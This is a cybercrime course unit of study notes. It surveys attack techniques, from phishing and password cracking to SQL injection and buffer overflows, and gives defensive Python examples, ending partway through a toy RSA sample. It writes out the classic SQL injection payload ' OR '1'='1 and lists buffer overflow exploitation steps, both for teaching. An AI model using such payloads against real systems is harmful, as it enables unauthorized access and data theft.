Unit III
Tools and Methods Used in Cybercrime
Unit Overview
This unit examines the various tools and methods employed by cybercriminals to conduct malicious activities. Understanding these techniques is essential for developing effective defensive strategies and recognizing potential threats.
Topics Covered
- Proxy Servers
- Phishing Attacks
- Password Cracking
- Keyloggers and Spyware
- Malware Types
- Steganography
- DoS/DDoS Attacks
- SQL Injection
- Wireless Attacks
- Identity Theft
3.1 Introduction
Cybercriminals utilize a diverse arsenal of tools ranging from simple scripts to sophisticated software frameworks. These tools are used for reconnaissance, exploitation, maintaining access, and covering tracks. The methods may be automated or require significant manual expertise.
Categories of Cybercrime Tools
- Reconnaissance Tools: Used to gather information about targets
- Exploitation Tools: Used to take advantage of vulnerabilities
- Malware: Malicious software for various purposes
- Attack Tools: Used to conduct specific types of attacks
- Evasion Tools: Used to hide identity and activities
3.2 Proxy Servers and Anonymizers
Types of Proxy Servers
| Type | Description | Anonymity Level |
|---|---|---|
| Transparent Proxy | Identifies itself as a proxy, passes original IP | None |
| Anonymous Proxy | Identifies as proxy but hides original IP | Moderate |
| Elite/High Anonymity Proxy | Does not identify as proxy, hides all information | High |
| Distorting Proxy | Provides false IP address | Moderate |
Anonymization Technologies
1. The Onion Router (Tor)
Tor is a network of volunteer-operated servers that enables anonymous communication by routing traffic through multiple relays, encrypting data at each hop. Each relay only knows the previous and next hop, making traffic analysis difficult.
2. Virtual Private Networks (VPN)
VPNs create encrypted tunnels between user devices and VPN servers, masking the user's IP address and encrypting all traffic. While primarily for privacy, VPNs can be misused for anonymous criminal activity.
3. Proxy Chains
Proxy chaining routes traffic through multiple proxies in sequence, adding layers of indirection between the user and the destination to increase anonymity.
Legitimate vs. Malicious Uses
| Legitimate Uses | Malicious Uses |
|---|---|
| Privacy protection | Hiding criminal activity |
| Bypassing censorship | Evading law enforcement |
| Secure communications for journalists | Conducting cyber attacks anonymously |
| Corporate security | Distributing illegal content |
Key Points for Examination:
- Proxies act as intermediaries between users and the internet
- Tor provides layered encryption through multiple relays
- Anonymizers have both legitimate and malicious applications
- Elite proxies provide highest anonymity by not identifying as proxies
3.3 Phishing
Types of Phishing Attacks
| Type | Description | Target |
|---|---|---|
| Email Phishing | Mass emails impersonating legitimate organizations | General population |
| Spear Phishing | Targeted attacks using personalized information | Specific individuals |
| Whaling | Targeting high-level executives | C-level executives |
| Clone Phishing | Replicating legitimate emails with malicious modifications | Previous recipients of legitimate emails |
| Vishing | Voice-based phishing using phone calls | Phone users |
| Smishing | SMS-based phishing | Mobile phone users |
Phishing Attack Components
- Lure: The bait that attracts victim's attention (urgency, fear, reward)
- Hook: The mechanism that captures victim's data (fake website, form)
- Catch: The exploitation of captured information
Identifying Phishing Attempts
- Suspicious sender email addresses (misspelled domains)
- Generic greetings instead of personalized salutations
- Urgent or threatening language
- Requests for sensitive information
- Mismatched or suspicious URLs
- Poor grammar and spelling errors
- Unexpected attachments
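The indicators listed above can be turned into automated checks. The following is an added example, not part of the original unit: it scans a constructed message for a lookalike sender domain, a display name that borrows a trusted brand, urgent language, a generic greeting, and links whose visible text points at a different domain than the real target. The trusted domain, the sample messages and the urgency phrases are all assumptions made up for the demonstration.

```python
import re
from email.utils import parseaddr
from urllib.parse import urlparse

# Constructed for this example: the organisation's genuine domain and two sample messages.
TRUSTED_DOMAINS = {"examplebank.com"}
URGENCY_PHRASES = ("immediately", "urgent", "suspended", "within 24 hours", "verify your account")
LINK_RE = re.compile(r'<a\s+href="([^"]+)"[^>]*>([^<]+)</a>', re.IGNORECASE)

SUSPICIOUS_EMAIL = {
    "from": "ExampleBank Support <alerts@examp1ebank.com>",   # digit 1 standing in for letter l
    "subject": "Urgent: your account will be suspended",
    "body": ("Dear Customer,\n"
             "Verify your account immediately or it will be suspended within 24 hours.\n"
             '<a href="http://login.examp1ebank.com/verify">https://www.examplebank.com/login</a>\n'),
}
LEGITIMATE_EMAIL = {
    "from": "ExampleBank <alerts@examplebank.com>",
    "subject": "Your monthly statement is available",
    "body": ("Hello Priya,\n"
             '<a href="https://www.examplebank.com/statements">https://www.examplebank.com/statements</a>\n'),
}


def registrable_domain(host):
    """Last two labels of a hostname (assumption: no multi-part suffixes such as co.uk)."""
    parts = host.lower().rstrip(".").split(".")
    return ".".join(parts[-2:])


def phishing_indicators(msg, trusted=TRUSTED_DOMAINS):
    """Return the names of the indicators from the list above that msg triggers."""
    found = []
    display_name, addr = parseaddr(msg["from"])
    sender_domain = registrable_domain(addr.rpartition("@")[2])
    if sender_domain not in trusted:
        # crude lookalike check: digits commonly substituted for letters
        if sender_domain.replace("1", "l").replace("0", "o") in trusted:
            found.append("lookalike_sender_domain")
        else:
            found.append("untrusted_sender_domain")
        # display name borrows a trusted brand while the address does not belong to it
        if any(t.split(".")[0] in display_name.lower() for t in trusted):
            found.append("display_name_impersonation")
    text = (msg["subject"] + " " + msg["body"]).lower()
    if any(p in text for p in URGENCY_PHRASES):
        found.append("urgent_language")
    if re.search(r"\bdear (customer|user|member)\b", text):
        found.append("generic_greeting")
    for href, visible in LINK_RE.findall(msg["body"]):
        href_host = urlparse(href).hostname or ""
        visible = visible.strip()
        visible_host = urlparse(visible if "://" in visible else "http://" + visible).hostname or ""
        if visible_host and registrable_domain(href_host) != registrable_domain(visible_host):
            found.append("link_text_mismatch")
        if href.lower().startswith("http://"):
            found.append("plain_http_link")
    return found
```

Each indicator on its own is only a hint; mail filters score several together, and the lookalike check here is deliberately crude (a production filter would use a confusable-character table and the public suffix list).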
Prevention Measures
- Email filtering and anti-phishing tools
- User awareness training
- Multi-factor authentication
- URL verification before clicking
- Reporting suspicious emails
Key Points for Examination:
- Phishing exploits human psychology, not technical vulnerabilities
- Spear phishing targets specific individuals with personalized attacks
- Whaling targets senior executives with high-value access
- User training is the primary defense against phishing
3.4 Password Cracking
Password Cracking Techniques
| Technique | Description | Time Required |
|---|---|---|
| Brute Force | Trying all possible combinations systematically | Very long for complex passwords |
| Dictionary Attack | Using a list of common words and phrases | Fast for common passwords |
| Rainbow Table | Using pre-computed hash chains | Fast once tables are generated |
| Hybrid Attack | Combining dictionary words with variations | Moderate |
| Rule-Based Attack | Applying transformation rules to wordlists | Moderate |
Password Storage Methods
- Plain Text: Highly insecure, passwords stored as-is
- Hashing: One-way mathematical function (MD5, SHA-1, SHA-256)
- Salted Hashing: Random data added before hashing
- Key Stretching: Computationally intensive hashing (bcrypt, PBKDF2)
Defense Against Password Cracking
- Use strong, complex passwords (length, character variety)
- Implement account lockout policies
- Use salted hashes with key stretching
- Enable multi-factor authentication
- Regular password rotation
- Password strength enforcement
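The storage methods and defences above can be compared directly in code. This added example (not from the original unit) contrasts an unsalted MD5 hash, which a precomputed table recovers instantly, with a salted PBKDF2-HMAC-SHA256 hash that differs for every user and is verified in constant time. The iteration count, the storage format string and the list of "common passwords" standing in for a rainbow table are assumptions made for the demonstration.

```python
import hashlib
import hmac
import os

# Work factor for PBKDF2-HMAC-SHA256; assumption: tune so one hash takes ~100 ms on your servers.
ITERATIONS = 600_000
SALT_BYTES = 16


def hash_password(password, salt=None, iterations=ITERATIONS):
    """Salted, stretched hash in a self-describing storage format."""
    if salt is None:
        salt = os.urandom(SALT_BYTES)          # fresh random salt for every password
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), digest.hex())


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count, then compare in constant time."""
    algo, iterations, salt_hex, hash_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash format")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest, bytes.fromhex(hash_hex))


def unsalted_md5(password):
    """The weak 'Hashing' storage method: no salt, fast, same hash for the same password everywhere."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


# Stand-in for a precomputed (rainbow) table: hash -> password for a few constructed common passwords.
COMMON_PASSWORDS = ["123456", "password", "Summer2024!", "qwerty"]
PRECOMPUTED = {unsalted_md5(p): p for p in COMMON_PASSWORDS}


def lookup_precomputed(stored_hash):
    """Instant recovery of an unsalted hash that appears in the table; None otherwise."""
    return PRECOMPUTED.get(stored_hash)


def demo(password="Summer2024!"):
    """Same password on two accounts: unsalted hashes collide and sit in the table; salted ones differ."""
    salted_a = hash_password(password)
    salted_b = hash_password(password)
    return {
        "unsalted_equal": unsalted_md5(password) == unsalted_md5(password),
        "unsalted_in_table": lookup_precomputed(unsalted_md5(password)) == password,
        "salted_equal": salted_a == salted_b,
        "salted_in_table": lookup_precomputed(salted_a) is not None,
        "verify_correct": verify_password(password, salted_a),
        "verify_wrong_case": verify_password(password.lower(), salted_a),
    }
```

Because the salt is stored beside the hash, an attacker who steals the table must build a separate table per salt, which is what makes rainbow tables useless; the iteration count is what makes each guess expensive.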
Key Points for Examination:
- Brute force attacks try all possible combinations
- Dictionary attacks use lists of common passwords
- Rainbow tables trade storage for computation time
- Salting prevents rainbow table attacks
3.5 Keyloggers and Spyware
A keylogger is a surveillance tool that records keystrokes made on a computer or mobile device. It captures all typed information including passwords, messages, and other sensitive data.
Detailed Explanation: Keyloggers are one of the most effective tools for stealing credentials and sensitive information. They work silently in the background, capturing every key pressed by the user. The recorded data is either stored locally or transmitted to the attacker remotely.
How Keyloggers Work:
- API Hooking: Intercepts system API calls for keyboard input
- Kernel-level Hooking: Operates at the operating system kernel level for deeper access
- Form Grabbing: Captures data from web forms before encryption
- JavaScript Injection: Web-based keyloggers embedded in malicious websites
Legitimate Uses: Employee monitoring, parental controls, forensic investigations, troubleshooting
Malicious Uses: Stealing passwords, credit card numbers, personal information, corporate espionage
Spyware is software that secretly monitors and collects information about user activities without consent. It may track browsing habits, capture screenshots, record audio/video, and steal personal data.
Detailed Explanation: Spyware is broader than keyloggers, encompassing various surveillance capabilities. It operates covertly, consuming system resources while gathering comprehensive information about user behavior, communications, and data.
Spyware Categories:
- System Monitors: Track all computer activities including emails, chat, websites
- Tracking Cookies: Monitor web browsing and collect marketing data
- Adware: Displays unwanted ads based on collected browsing data
- Trojans: Disguised as legitimate software to gain access
- Commercial Spyware: Marketed as monitoring tools (employee/child monitoring)
- Mobile Spyware: Specialized for smartphones, tracks location, calls, messages
Impact: Privacy invasion, identity theft, financial loss, system performance degradation, bandwidth consumption
Types of Keyloggers
| Type | Description | Detection Difficulty |
|---|---|---|
| Hardware Keyloggers | Physical devices attached between keyboard and computer | Easy (visual inspection) |
| Software Keyloggers | Programs installed on the target system | Moderate (antivirus detection) |
| Kernel-Level Keyloggers | Operating at the OS kernel level | Difficult |
| Form Grabbers | Capture form data before encryption | Difficult |
| Memory-Injection Keyloggers | Inject code into running processes | Very Difficult |
Spyware Capabilities
- Keystroke logging
- Screen capture and recording
- Audio/video recording through microphone and camera
- Browser history and cookie monitoring
- Email and message interception
- File system monitoring
- Location tracking (mobile devices)
- Credential harvesting
Distribution Methods
- Bundled with free software
- Malicious email attachments
- Drive-by downloads
- Exploiting software vulnerabilities
- Social engineering
Detection and Prevention
- Anti-spyware and antivirus software
- Regular system scans
- Monitoring for unusual system behavior
- Using virtual keyboards for sensitive input
- Regular software updates
- Physical inspection for hardware keyloggers
Key Points for Examination:
- Keyloggers can be hardware or software-based
- Spyware monitors user activities without consent
- Kernel-level keyloggers are most difficult to detect
- Virtual keyboards can mitigate software keylogger risks
3.6 Viruses and Worms
A virus is a malicious program that attaches itself to a legitimate program or file and requires human action to spread. When the infected program is executed, the virus activates and can replicate, corrupt data, or perform other malicious actions.
Detailed Explanation: Computer viruses are among the oldest forms of malware, named for their biological analogy. Like biological viruses, they require a host (program or file) and replicate by inserting copies of themselves into other files or programs. The key distinction is that viruses cannot spread without human intervention - someone must run the infected file.
Virus Lifecycle:
- Infection: Virus attaches to host file or program
- Activation: User executes infected file, activating virus
- Replication: Virus copies itself to other files
- Payload Delivery: Executes malicious actions (damage, data theft)
- Propagation: Spreads through file sharing, email, removable media
Common Infection Vectors: Email attachments, infected downloads, removable media (USB drives), file sharing networks, macro-enabled documents
A worm is a self-replicating malware that spreads automatically across networks without requiring human intervention or attachment to host programs. Worms exploit vulnerabilities to propagate.
Detailed Explanation: Worms are standalone malicious programs that represent a more dangerous evolution from viruses. They can scan networks for vulnerable systems, automatically exploit those vulnerabilities, copy themselves to new systems, and repeat the process - all without human interaction. This autonomous behavior enables worms to spread rapidly across networks, potentially affecting thousands of systems in hours.
Worm Characteristics:
- Self-contained: Complete executable programs, don't need host files
- Autonomous propagation: Spread without human action
- Network-aware: Actively scan and target network systems
- Exploit-driven: Leverage specific vulnerabilities for propagation
- Resource-intensive: Can severely degrade network performance
Propagation Methods:
- Network Exploitation: Exploiting vulnerabilities in network services (SMB, RDP, etc.)
- Email: Sending copies to email contacts with enticing subject lines
- File Sharing: Copying to shared network drives and folders
- Removable Media: Auto-executing from USB drives
- Instant Messaging: Spreading through chat applications
Famous Worm Examples and Their Impact:
- Morris Worm (1988): First major internet worm, affected 10% of internet (6,000 computers)
- ILOVEYOU (2000): Spread via email, caused $10 billion in damages
- Code Red (2001): Exploited IIS vulnerability, infected 359,000 servers in 14 hours
- SQL Slammer (2003): Fastest-spreading worm, doubled infected systems every 8.5 seconds
- Conficker (2008): Created massive botnet of 10-15 million computers
- WannaCry (2017): Ransomware worm affecting 200,000+ computers in 150 countries
Comparison: Virus vs. Worm
| Characteristic | Virus | Worm |
|---|---|---|
| Host Requirement | Requires host file or program | Standalone, no host needed |
| Propagation | Requires user action | Self-propagating |
| Spread Speed | Slower | Faster |
| Network Impact | Limited | Can consume bandwidth significantly |
| Primary Damage | File/system corruption | Network congestion, payload delivery |
Types of Viruses
- Boot Sector Virus: Infects the master boot record
- File Infector: Attaches to executable files
- Macro Virus: Infects document macros (Word, Excel)
- Polymorphic Virus: Changes its code to evade detection
- Metamorphic Virus: Completely rewrites itself
- Multipartite Virus: Infects multiple targets (boot sector and files)
Notable Worms
- Morris Worm (1988): First worm to gain significant attention
- ILOVEYOU (2000): Spread via email, caused billions in damage
- Code Red (2001): Exploited IIS vulnerability
- Slammer (2003): Fastest spreading worm, caused internet slowdowns
- Conficker (2008): Infected millions of computers worldwide
- WannaCry (2017): Ransomware worm exploiting EternalBlue
Key Points for Examination:
- Viruses require host programs; worms are standalone
- Worms spread automatically without user intervention
- Polymorphic viruses change code to evade detection
- Worms can cause significant network congestion
3.7 Trojan Horses and Backdoors
Types of Trojans
| Type | Description |
|---|---|
| Remote Access Trojan (RAT) | Provides remote control over infected systems |
| Banking Trojan | Steals financial credentials and banking information |
| Downloader Trojan | Downloads and installs additional malware |
| Dropper Trojan | Contains and installs other malware payloads |
| Ransomware Trojan | Encrypts files and demands ransom |
| Rootkit | Hides its presence and other malware from detection |
Backdoor Characteristics
- Bypasses normal authentication mechanisms
- Provides persistent access to compromised systems
- May be hidden within legitimate software
- Often uses encryption to hide communications
- May use common ports to blend with normal traffic
Detection and Prevention
- Antivirus and anti-malware software
- Network traffic monitoring
- File integrity monitoring
- Application whitelisting
- Download software only from trusted sources
- Regular security audits
Key Points for Examination:
- Trojans do not self-replicate; they rely on social engineering
- RATs provide complete remote control to attackers
- Backdoors enable persistent unauthorized access
- Rootkits actively hide malware presence
3.8 Steganography
Steganography vs. Cryptography
| Aspect | Steganography | Cryptography |
|---|---|---|
| Purpose | Hide existence of message | Make message unreadable |
| Detection | Difficult to detect | Presence obvious |
| Medium | Images, audio, video, text | Any data format |
| If Discovered | Message may be readable | Message still protected |
Types of Steganography
- Image Steganography: Hiding data in image files using LSB manipulation
- Audio Steganography: Embedding data in audio files
- Video Steganography: Hiding information in video streams
- Text Steganography: Using formatting, whitespace, or linguistic methods
- Network Steganography: Hiding data in network protocols
LSB (Least Significant Bit) Technique
The most common image steganography technique involves replacing the least significant bits of pixel values with message bits. Since the change is minimal, it is imperceptible to human vision.
Malicious Uses
- Concealing malware in images or documents
- Covert communication by criminals or terrorists
- Data exfiltration from organizations
- Hiding command and control communications
Detection (Steganalysis)
- Statistical analysis of carrier files
- Comparison with known clean files
- Specialized detection software
- Visual and signature-based detection
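The LSB technique described above and two of the steganalysis approaches just listed (comparison with a known clean file, and statistical analysis of the carrier) are shown together in this added example, which is not part of the original unit. The "image" is a constructed array of 8-bit grayscale samples rather than a real file; the 4-byte length header, the even-value bias of the constructed carrier and the pair-imbalance statistic are assumptions made for the demonstration.

```python
import random


def embed_lsb(carrier, payload):
    """Write payload (prefixed with a 4-byte big-endian length) into the least significant
    bit of successive 8-bit samples of carrier, one message bit per sample."""
    data = len(payload).to_bytes(4, "big") + payload
    bits = [(byte >> (7 - i)) & 1 for byte in data for i in range(8)]
    if len(bits) > len(carrier):
        raise ValueError("carrier too small: need %d samples, have %d" % (len(bits), len(carrier)))
    stego = bytearray(carrier)
    for i, bit in enumerate(bits):
        stego[i] = (stego[i] & 0xFE) | bit      # clear the LSB, then set it to the message bit
    return bytes(stego)


def extract_lsb(stego):
    """Read the LSBs back: first the length header, then that many payload bytes."""
    def read(offset, count):
        out = bytearray()
        for b in range(count):
            value = 0
            for i in range(8):
                value = (value << 1) | (stego[offset + b * 8 + i] & 1)
            out.append(value)
        return bytes(out)
    length = int.from_bytes(read(0, 4), "big")
    return read(32, length)


def compare_with_clean(clean, suspect):
    """Steganalysis with a known clean copy: returns (fraction of samples changed, whether every
    change is confined to the LSB). Changes limited to the LSB are the fingerprint of LSB embedding."""
    if len(clean) != len(suspect):
        raise ValueError("files differ in size")
    xors = [a ^ b for a, b in zip(clean, suspect)]
    changed = sum(1 for x in xors if x)
    only_lsb = all(x in (0, 1) for x in xors)
    return changed / len(clean), only_lsb


def pair_imbalance(samples):
    """Statistical steganalysis without a clean copy: in an untouched carrier the counts of the
    values 2k and 2k+1 usually differ; embedding random-looking bits evens each pair out.
    Returns the mean relative imbalance over all value pairs (near 0 suggests a full embedding)."""
    counts = [0] * 256
    for s in samples:
        counts[s] += 1
    ratios = [abs(counts[2 * k] - counts[2 * k + 1]) / (counts[2 * k] + counts[2 * k + 1])
              for k in range(128) if counts[2 * k] + counts[2 * k + 1]]
    return sum(ratios) / len(ratios)


def make_carrier(n=4096, seed=7):
    """Constructed stand-in for grayscale image data: seeded pseudo-random samples biased
    towards even values, mimicking the uneven value pairs of a natural image."""
    rng = random.Random(seed)
    return bytes((rng.randrange(256) & 0xFE) if rng.random() < 0.9 else rng.randrange(256)
                 for _ in range(n))
```

The pair statistic is a simplified form of the chi-square LSB test; it only flags embeddings that fill most of the carrier, which is why steganographers spread short messages over random sample positions and why a clean reference copy, when available, is the stronger check.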
Key Points for Examination:
- Steganography hides the existence of data, not its content
- LSB technique is common for image steganography
- Often combined with encryption for additional security
- Steganalysis is the detection of hidden data
3.9 DoS and DDoS Attacks
Types of DoS/DDoS Attacks
1. Volume-Based Attacks
- UDP Flood: Overwhelming target with UDP packets
- ICMP Flood: Ping flood attacks
- DNS Amplification: Using DNS servers to amplify attack traffic
2. Protocol Attacks
- SYN Flood: Exploiting TCP handshake
- Ping of Death: Sending malformed ping packets
- Smurf Attack: ICMP amplification using broadcast addresses
3. Application Layer Attacks
- HTTP Flood: Overwhelming web servers with HTTP requests
- Slowloris: Keeping connections open with partial requests
- Zero-Day DDoS: Exploiting unknown vulnerabilities
DoS vs. DDoS Comparison
| Aspect | DoS | DDoS |
|---|---|---|
| Attack Source | Single system | Multiple systems (botnet) |
| Attack Power | Limited | Massive |
| Blocking | Relatively easy (block source IP) | Difficult (many sources) |
| Detection | Easier | More complex |
Mitigation Strategies
- Rate limiting and traffic filtering
- Content Delivery Networks (CDN)
- DDoS protection services
- Redundant infrastructure
- Black hole routing
- Web Application Firewalls (WAF)
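Rate limiting, the first mitigation in the list above, and the DoS vs. DDoS distinction from the comparison table can both be seen in one small simulation. This is an added example, not part of the original unit: a per-source sliding-window limiter is replayed over constructed traffic (RFC 5737 documentation addresses), first a single-source flood and then the same request volume spread over fifty sources. The limit of five requests per second and the traffic itself are assumptions made for the demonstration.

```python
from collections import defaultdict, deque


class SlidingWindowLimiter:
    """Allow at most max_requests per source within any window_seconds interval."""

    def __init__(self, max_requests, window_seconds):
        self.max_requests = max_requests
        self.window = window_seconds
        self.history = defaultdict(deque)   # source -> timestamps of recently allowed requests

    def allow(self, source, now):
        recent = self.history[source]
        while recent and now - recent[0] >= self.window:
            recent.popleft()                 # drop timestamps that fell out of the window
        if len(recent) >= self.max_requests:
            return False
        recent.append(now)
        return True


def simulate(requests, max_requests=5, window_seconds=1.0):
    """Replay (timestamp, source_ip) pairs in time order; return allowed/blocked counts per source."""
    limiter = SlidingWindowLimiter(max_requests, window_seconds)
    stats = defaultdict(lambda: {"allowed": 0, "blocked": 0})
    for ts, src in sorted(requests):
        stats[src]["allowed" if limiter.allow(src, ts) else "blocked"] += 1
    return dict(stats)


# Constructed traffic using documentation address ranges (RFC 5737).
# DoS: one source sends 50 requests within one second while a legitimate client sends three.
SINGLE_SOURCE_FLOOD = [(i * 0.02, "192.0.2.10") for i in range(50)] + \
                      [(0.1, "198.51.100.7"), (0.5, "198.51.100.7"), (0.9, "198.51.100.7")]
# DDoS: the same 50 requests spread over 50 bot addresses, one request each.
DISTRIBUTED_FLOOD = [(i * 0.02, "203.0.113.%d" % (i + 1)) for i in range(50)]
```

The single-source flood is cut to five requests while the legitimate client is untouched, but every request of the distributed flood passes, which is exactly why the table rates blocking a DDoS as difficult and why upstream scrubbing services, CDNs and black-hole routing appear in the mitigation list.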
Key Points for Examination:
- DoS uses single source; DDoS uses multiple sources
- SYN flood exploits TCP three-way handshake
- Amplification attacks use third-party servers to magnify traffic
- Application layer attacks are harder to detect
3.10 SQL Injection
How SQL Injection Works
SQL injection occurs when user input is incorrectly filtered or not properly sanitized before being included in SQL queries. The attacker's input becomes part of the SQL command executed by the database.
Example:
Vulnerable Query:
SELECT * FROM users WHERE username = '[user_input]' AND password = '[password]'
Malicious Input: ' OR '1'='1
Resulting Query:
SELECT * FROM users WHERE username = '' OR '1'='1' AND password = ''
Types of SQL Injection
| Type | Description |
|---|---|
| In-band SQLi | Attacker receives results in the same channel used for attack |
| Error-based SQLi | Uses error messages to extract information |
| Union-based SQLi | Uses UNION operator to combine queries |
| Blind SQLi | No direct feedback; uses time delays or boolean conditions |
| Out-of-band SQLi | Uses different channels (DNS, HTTP) to retrieve data |
Prevention Measures
- Parameterized Queries: Use prepared statements with bound parameters
- Input Validation: Validate and sanitize all user inputs
- Stored Procedures: Use stored procedures for database access
- Least Privilege: Database accounts with minimal permissions
- Web Application Firewall: Filter malicious requests
- Error Handling: Suppress detailed error messages
Key Points for Examination:
- SQL injection exploits improper input handling
- Parameterized queries are the primary defense
- Blind SQL injection works without visible error messages
- Can result in data theft, modification, or destruction
3.11 Buffer Overflow
Types of Buffer Overflow
| Type | Description |
|---|---|
| Stack-based | Overflow occurs in stack memory; can overwrite return addresses |
| Heap-based | Overflow occurs in heap memory; more complex to exploit |
| Integer Overflow | Arithmetic overflow leads to buffer miscalculation |
| Format String | Exploits improper use of format functions |
Exploitation Process
- Identify vulnerable input point
- Determine buffer size and memory layout
- Craft payload including shellcode
- Overflow buffer to overwrite return address
- Redirect execution to shellcode
Prevention Mechanisms
- Address Space Layout Randomization (ASLR): Randomizes memory addresses
- Data Execution Prevention (DEP): Prevents code execution in data segments
- Stack Canaries: Detection values placed before return addresses
- Bounds Checking: Validate input lengths before copying
- Safe Functions: Use secure alternatives (strncpy instead of strcpy)
- Code Review: Regular security audits of code
Key Points for Examination:
- Buffer overflow writes data beyond allocated memory
- Stack-based overflows can overwrite return addresses
- ASLR and DEP are primary OS-level protections
- Safe programming practices prevent buffer overflows
3.12 Attacks on Wireless Networks
Types of Wireless Network Attacks
| Attack | Description | Target |
|---|---|---|
| Evil Twin | Rogue access point mimicking legitimate networks | User credentials, traffic |
| Rogue Access Point | Unauthorized AP connected to network | Network access |
| War Driving | Searching for wireless networks while moving | Network discovery |
| Packet Sniffing | Intercepting wireless traffic | Data, credentials |
| WEP Cracking | Breaking weak WEP encryption | Network access |
| WPA Cracking | Dictionary attacks on WPA/WPA2-PSK | Network access |
| Deauthentication Attack | Forcing clients to disconnect | Service disruption, capture handshakes |
| KRACK Attack | Key Reinstallation Attack on WPA2 | Traffic decryption |
Wireless Security Protocols
| Protocol | Security Level | Status |
|---|---|---|
| WEP | Very Weak | Deprecated, easily cracked |
| WPA | Moderate | Superseded, TKIP vulnerabilities |
| WPA2 | Strong | Widely used, KRACK vulnerability |
| WPA3 | Very Strong | Current standard, SAE handshake |
Prevention Measures
- Use WPA3 or WPA2 with strong passphrases
- Disable WPS (Wi-Fi Protected Setup)
- Use 802.1X authentication for enterprise networks
- Implement wireless intrusion detection
- Regular security assessments
- Network segmentation
Key Points for Examination:
- WEP is deprecated due to fundamental weaknesses
- Evil twin attacks create fake access points
- WPA3 provides strongest current protection
- Enterprise networks should use 802.1X authentication
3.13 Identity Theft
Types of Identity Theft
| Type | Description |
|---|---|
| Financial Identity Theft | Using stolen information for financial fraud |
| Criminal Identity Theft | Using another's identity when apprehended for crimes |
| Medical Identity Theft | Using stolen information to obtain medical services |
| Synthetic Identity Theft | Creating new identities combining real and fake information |
| Child Identity Theft | Using a minor's information for fraud |
| Tax Identity Theft | Filing fraudulent tax returns using stolen information |
Methods of Information Theft
- Phishing and social engineering
- Data breaches
- Dumpster diving (physical document theft)
- Mail theft
- Skimming devices
- Malware (keyloggers, spyware)
- Dark web purchases
Prevention Measures
- Monitor credit reports regularly
- Use strong, unique passwords
- Enable fraud alerts
- Shred sensitive documents
- Be cautious with personal information
- Use credit monitoring services
- Freeze credit when not applying for new credit
Key Points for Examination:
- Identity theft uses personal information for fraudulent purposes
- Phishing is a primary method for obtaining personal data
- Financial identity theft is the most common type
- Regular monitoring helps detect identity theft early
3.14 Cryptography
Cryptography is the practice and study of techniques for securing communication and data from unauthorized access. It transforms readable data (plaintext) into an unreadable format (ciphertext) that can only be decoded by authorized parties.
Key Concepts
| Term | Definition |
|---|---|
| Plaintext | The original readable data before encryption |
| Ciphertext | The encrypted, unreadable form of data |
| Encryption | The process of converting plaintext to ciphertext using an algorithm and key |
| Decryption | The process of converting ciphertext back to plaintext using a key |
| Key | A piece of information that controls the encryption/decryption process |
| Algorithm/Cipher | The mathematical procedure used for encryption and decryption |
Types of Cryptography
1. Symmetric Key Cryptography
Uses the same key for both encryption and decryption. Both sender and receiver must share the secret key securely.
| Algorithm | Key Size | Description |
|---|---|---|
| AES (Advanced Encryption Standard) | 128, 192, or 256 bits | Current industry standard; used by governments and financial institutions |
| DES (Data Encryption Standard) | 56 bits | Legacy algorithm; now considered insecure due to small key size |
| 3DES (Triple DES) | 168 bits | Applies DES three times; more secure than DES but slower |
| Blowfish | 32-448 bits | Fast, flexible block cipher; open-source alternative |
2. Asymmetric Key Cryptography (Public Key Cryptography)
Uses a pair of keys: a public key (shared openly) for encryption and a private key (kept secret) for decryption.
| Algorithm | Description | Use Cases |
|---|---|---|
| RSA (Rivest-Shamir-Adleman) | Based on factoring large prime numbers; key sizes 1024-4096 bits | Digital signatures, secure key exchange, SSL/TLS |
| ECC (Elliptic Curve Cryptography) | Based on elliptic curve mathematics; smaller keys with equivalent security | Mobile devices, IoT (due to efficiency) |
| Diffie-Hellman | Key exchange protocol for securely sharing keys over public channels | Establishing shared secrets in protocols like TLS |
3. Hash Functions
A hash function is a one-way mathematical function that converts input data of any size into a fixed-size output (hash value or digest). It is NOT encryption because it cannot be reversed.
Properties of Cryptographic Hash Functions:
- Deterministic: Same input always produces the same output
- One-Way: Cannot derive original input from hash value
- Collision-Resistant: Extremely difficult to find two inputs with the same hash
- Avalanche Effect: Small change in input produces completely different hash
| Algorithm | Output Size | Status |
|---|---|---|
| MD5 | 128 bits | INSECURE - collision vulnerabilities found; not recommended |
| SHA-1 | 160 bits | DEPRECATED - known weaknesses; being phased out |
| SHA-256 | 256 bits | SECURE - current recommended standard |
| SHA-3 | 224-512 bits | SECURE - newest standard with different design |
| bcrypt | Variable | SECURE - specifically designed for password hashing; includes salt |
Use Cases for Hashing:
- Password Storage: Store hashes instead of plaintext passwords
- Data Integrity: Verify files haven't been modified (checksums)
- Digital Signatures: Hash of document is signed with private key
- Forensics: Verify evidence integrity in chain of custody
Encryption vs Decryption
| Encryption | Decryption |
|---|---|
| Converts plaintext to ciphertext | Converts ciphertext back to plaintext |
| Uses encryption key and algorithm | Uses decryption key (same or different) and algorithm |
| Makes data unreadable to unauthorized parties | Restores data to readable form for authorized parties |
| Sender performs encryption | Receiver performs decryption |
Digital Signatures
A Digital Signature is a cryptographic mechanism that provides authenticity, integrity, and non-repudiation for digital documents and messages. It uses asymmetric cryptography.
How Digital Signatures Work:
- Signing: Sender creates hash of the document, then encrypts hash with their private key
- Verification: Receiver decrypts signature with sender's public key to get hash
- Comparison: Receiver creates fresh hash of received document and compares with decrypted hash
- If hashes match, document is authentic and unmodified
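The hash-function properties listed under 3.14.3 and the sign/verify steps just described are demonstrated together in this added example, which is not part of the original unit. SHA-256 comes from Python's standard library; the signature uses a toy RSA key pair built at import time from two small primes (1009 and 1013), chosen here for illustration only, and the digest is reduced modulo the toy modulus so that it fits. Real signatures use keys of 2048 bits or more and a padding scheme such as RSA-PSS instead of that reduction.

```python
import hashlib


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def bit_difference(hex_a, hex_b):
    """Number of differing bits between two equal-length hex digests (avalanche effect check)."""
    return bin(int(hex_a, 16) ^ int(hex_b, 16)).count("1")


# Toy RSA key pair from the small primes p=1009 and q=1013; constructed for illustration only.
TOY_P, TOY_Q = 1009, 1013
TOY_N = TOY_P * TOY_Q
TOY_E = 65537
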